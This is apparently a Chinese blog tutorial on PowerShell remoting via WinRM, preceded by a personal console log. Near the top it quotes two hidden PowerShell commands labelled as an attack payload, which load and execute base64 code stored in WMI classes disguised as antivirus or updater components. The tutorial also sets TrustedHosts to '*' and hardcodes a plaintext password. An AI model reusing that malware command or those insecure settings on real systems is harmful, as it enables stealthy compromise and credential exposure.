寫在前面
PS C:\Users\l00379637> Test-WSMan 10.129.0.155 Test-WSMan : <f:WSManFault xmlns:f="http://schemas.microsoft.com/wbem/wsman/1/wsmanfault" Code="2150859046" Machine="DE SKTOP-NFBQJAR.china.huawei.com"><f:Message>WinRM 無法完成該操作。 請驗證指定的計算機名稱有效,可以通過網絡訪問該計算機 ,以及啟用了 WinRM 服務的防火牆例外並允許從此計算機中進行訪問。 默認情況下,公用配置文件的 WinRM 防火牆例外僅限訪問同一 本地子網中的遠程計算機。 </f:Message></f:WSManFault> 所在位置 行:1 字符: 1 + Test-WSMan 10.129.0.155 + ~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidOperation: (10.129.0.155:String) [Test-WSMan],InvalidOperationException + FullyQualifiedErrorId : WsManError,Microsoft.WSMan.Management.TestWSManCommand ==>看來是配置有問題!!! PS C:\Users\l00379637> Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l003XXXX7 Enter-PSSession : 連接到遠程服務器 DESKTOP-NFBQJAR.china.huawei.com 失敗,並顯示以下錯誤消息: 客戶端無法連接到請求中指 定的目標。 請驗證該目標上的服務是否正在運行以及是否正在接受請求。 有關目標(通常是 IIS 或 WinRM)上運行的 WS 管理服務,請 查閱日志和文檔。 如果目標是 WinRM 服務,則在目標上運行以下命令來分析和配置 WinRM 服務: "winrm quickconfig"。 有關詳細信 息,請參閱 about_Remote_Troubleshooting 幫助主題。 所在位置 行:1 字符: 1 + Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Crede ... + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + CategoryInfo : InvalidArgument: (DESKTOP-NFBQJAR.china.huawei.com:String) [Enter-PSSession],PSRemotingT ransportException + FullyQualifiedErrorId : CreateRemoteRunspaceFailed ==》還是一樣的問題,看來配置有問題!!! PS C:\Users\l00379637> Enable-PSRemoting -Force WinRM 已更新為接收請求。 成功更改 WinRM 服務類型。 已啟動 WinRM 服務。 WinRM 已經進行了更新,以用於遠程管理。 WinRM 防火牆異常已啟用。 ==》修改配置后,就好使了!!! PS C:\Users\l00379637> Set-Item wsman:\localhost\client\trustedhosts * WinRM 安全配置。 此命令修改 WinRM 客戶端的 TrustedHosts 列表。TrustedHosts 列表中的計算機可能不會經過身份驗證。該客戶端可能會向這些計算機發送憑據信息。是否確實要修改此列表? [Y] 是(Y) [N] 否(N) [S] 暫停(S) [?] 幫助 (默認值為“Y”): PS C:\Users\l00379637> Restart-Service WinRM 警告: 正在等待服務“Windows Remote Management (WS-Management) (WinRM)”停止... 警告: 正在等待服務“Windows Remote Management (WS-Management) (WinRM)”停止... PS C:\Users\l00379637> Test-WSMan 10.108.248.220 wsmid : http://schemas.dmtf.org/wbem/wsman/identity/1/wsmanidentity.xsd ProtocolVersion : http://schemas.dmtf.org/wbem/wsman/1/wsman.xsd ProductVendor : Microsoft Corporation ProductVersion : OS: 0.0.0 SP: 0.0 Stack: 3.0 ==》一起配置OK了,試試遠程訪問。。。 PS C:\Users\l00379637> Enter-PSSession -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l00XXXX7 [DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> [DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> [DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> [DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> echo hi hi ==》可以正常遠程執行命令了!!! [DESKTOP-NFBQJAR.china.huawei.com]: PS C:\Users\l00379637\Documents> exit PS C:\Users\l00379637> Invoke-Command -ComputerName DESKTOP-NFBQJAR.china.huawei.com -Credential l00379637 -ScriptBlock { Get-Service WinRM } Status Name DisplayName PSComputerName ------ ---- ----------- -------------- Running WinRM Windows Remote Management (WS-Manag... DESKTOP-NFBQJAR.china.huawei.com
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:System_Anti_Virus_Core').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
https://any.run/report/a9431ad6407aee17a444b61c83eaebca3cff79780daf9d456c81573bd5413984/f87664db-a20f-4e05-bdd9-fd5c3150d61a
攻擊payload:
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -NonI -W Hidden "$mon = ([WmiClass] 'root\default:systemcore_Updater').Properties['mon'].Value;$funs = ([WmiClass] 'root\default:systemcore_Updater').Properties['funs'].Value ;iex ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($funs)));Invoke-Command -ScriptBlock $RemoteScriptBlock -ArgumentList @($mon, $mon, 'Void', 0, '', '')"
在 linux 中我們可以使用 SSH 執行各種遠程操作,同樣的在 windows 平台上我們可以通過 PowerShell 獲得類似的能力。本文將介紹通過 PowerShell 執行遠程操作的基本信息。想了解 SSH 遠程操作的同學,可以參考《SSH 遠程執行任務》。
基礎
MS 定義了一個叫做 WS-Management 的協議,這個協議為計算機設備遠程交換管理數據提供了一個公開的標准。在 Windows 平台上,MS 通過 Windows 遠程管理服務(Windows Remote Management service,簡稱 WinRM) 實現了 WS-Management 協議。這就是我們可以通過 PowerShell 執行遠程操作的基礎,因為 PowerShell 就是通過 WinRM 服務來進行遠程操作的。
檢查 WinRM 服務
我們可以通過下面的命令查看 WinRM 服務的狀態:
Get-Service WinRM
服務器版的 Windows 系統默認是啟動 WinRM 服務的,而普通版的系統默認則沒有啟動該服務。接下來我們將介紹如何以正確的姿勢啟動這個服務。
配置系統接受遠程命令
類似於 SSH 的客戶端/服務器架構,只需要在接受遠程命令的主機上配置 WinRM 服務就可以了。其實就是讓 WinRM 服務監聽一個端口,跟 SSH daemon 是一樣的!
用管理員權限啟動 PowerShell,執行下面的命令:
Enable-PSRemoting –Force
然后再檢查 WinRM 服務就應該是運行狀態:
或者:
防火牆規則也發生了變化:
Enable-PSRemoting 命令不僅啟動了 WinRM 服務,還幫我們設置好了防火牆規則。
如果你的計算機已經加入了域,那么上面的配置就可以了。對於沒有加入域的計算機還需要進行信任設置,然后重啟 WinRM 服務:
Set-Item wsman:\localhost\client\trustedhosts * Restart-Service WinRM
測試遠程連接
PowerShell 還提供了一個命令用來測試遠程主機是否開啟了遠程操作服務:
Test-WsMan xxx.xxx.xxx.xxx
上面圖中的命令成功返回了,說明遠程主機上已經配置好了允許遠程訪問的服務。如果返回錯誤的消息,則說明遠程主機沒有打開遠程訪問的服務。
創建遠程連接 Session
這種方式類似於 SSH 的遠程連接。使用 SSH 客戶端建立一個到服務器的連接(session),然后執行各種操作。這是 SSH 最基本的使用方式,PowerShell 也提供了類似的支持讓我們可以做同樣的事情。
Enter-PSSession -ComputerName my-svr -Credential nickli
輸入密碼就可以建立連接了:
接下來就可以在遠程主機上執行任務了!
遠程執行單個命令
能夠在與遠程主機建立的 session 中執行任務是個很好的開始。但很多時候我們只需要簡單的執行單個命令,甚至是在腳本中執行這樣的命令,怎么辦呢?
我們可以通過 Invoke-Command 命令,並指定其 -ScriptBlock 參數完成這個任務:
Invoke-Command -ComputerName cd-lsr-svr -ScriptBlock { Get-Service WinRM } -credential nickli
執行上面的命令,並輸入用戶的密碼:
雖然命令被執行了,但缺陷也很明顯:需要用戶輸入密碼,因此無法被寫到腳本中進行自動化操作。
使用下面的方法把密碼寫到命令中(這樣就可以自動化了):
$Username = 'xxxx' $Password = 'yyyy' $pass = ConvertTo-SecureString -AsPlainText $Password -Force $Cred = New-Object System.Management.Automation.PSCredential -ArgumentList $Username,$pass Invoke-Command -ComputerName cd-lsr-svr -ScriptBlock { Get-Service WinRM } -credential $Cred
遠程執行多個命令
有時候我們需要連續執行多個有關聯的命令,比如后一條命令會用到前一條命令的結果。此時再使用上面的方法就不行了。需要通過 session 來處理命令之間的聯系:
Invoke-Command -ComputerName myserver -ScriptBlock {$p = Get-Process PowerShell} Invoke-Command -ComputerName myserver -ScriptBlock {$p.VirtualMemorySize} $s = New-PSSession -ComputerName myserver Invoke-Command -Session $s -ScriptBlock {$p = Get-Process PowerShell} Invoke-Command -Session $s -ScriptBlock {$p.VirtualMemorySize}
當我們直接執行前兩個命令時,由於第二個命令中的 $p 沒有值,所以不能獲得結果。最后兩行的命令是通過同一個 session 執行的,所以它們可以共享變量,並最終獲得結果。
遠程執行腳本
介紹了遠程執行命令的操作,再來介紹遠程執行腳本就容易多了。其實這才是自動化工作的核心部分:
Invoke-Command -ComputerName cm-12r2 -FilePath .\task.ps1
我在本地創建了腳本文件 task.ps1,task.ps1 中的腳本創建了一個 test.txt 文件,並把 PowerShell 的版本信息添加到這個文件中。運行上面的命令:
然后在遠程機器上看有沒有文件創建:
一切看上去都很好,只不過在實際應用中我們的腳本會更復雜而已!
在多個機器上執行相同的操作
同時在多台主機上做相同的操作會成倍的提升效率,這可以遠程操作的拿手好戲:
上面圖中的命令同時在兩台遠程主機上執行,其實就是為 ComputerName 屬性指定多個目標而已!
重復一遍:真正的威力是執行腳本文件:
這次,我們同時在兩台遠程主機上執行了腳本文件 task.ps1。
如果目標主機很多,還可以把它們寫到文件中,然后通過下面的方式引用:
Invoke-Command -ComputerName (Get-Content Machines.txt)
遠程拷貝文件
終於,PowerShell 在 5.x 的版本中開始支持遠程拷貝文件了!先來看 demo:
$mySession = new-PSSession -ComputerName xxxxxx Copy-Item -Path .\task.ps1 -Destination C:\task.ps1 -ToSession $mySession
上面的命令把本地當前目錄下的 task.ps1 文件拷貝到遠程主機 xxxxxx 的 C 盤根目錄下。注意 Copy-Item 命令使用了一個 Session 對象作為參數,這個參數的名稱為 ToSession。我們可以猜測,文件傳遞的方向就是由這個參數決定的:使用 ToSession 會把本地的文件傳遞到遠程主機;使用 FromSession 則會把遠程主機上的文件傳遞到本機。
再看一下如何拷貝整個目錄:
$mySession = new-PSSession -ComputerName xxxxxx Copy-Item -Path .\PowerShell -Destination C:\PowerShell -ToSession $mySession -Recurse
注意目錄拷貝操作要加上 Recurse 參數。
上面的兩個操作分別是把一個文件和一個目錄拷貝到遠程的主機上,接下來我們要把遠程主機上的文件或文件夾拷貝到本機來:
$mySession = new-PSSession -ComputerName xxxxxx Copy-Item -Path C:\task.ps1 -Destination F:\temp\task.ps1 -FromSession $mySession Copy-Item -Path C:\PowerShell -Destination F:\temp -FromSession $mySession -Recurse
注意這里使用的參數是 FromSession,所以命令中的 Destination 指定的是本地路徑。執行上面的命令,看看是不是已經把內容拷貝到本地的 F:\temp 目錄下了!
總結
本文簡單介紹了使用 PowerShell 進行遠程操作的基礎和一些常用的使用方法。總體來說,常用的操作和 SSH 基本都是類似的。而遠程拷貝文件的命令是 PowerShell 最新的版本才支持的,在使用時一定要先確定環境中 PowerShell 的版本。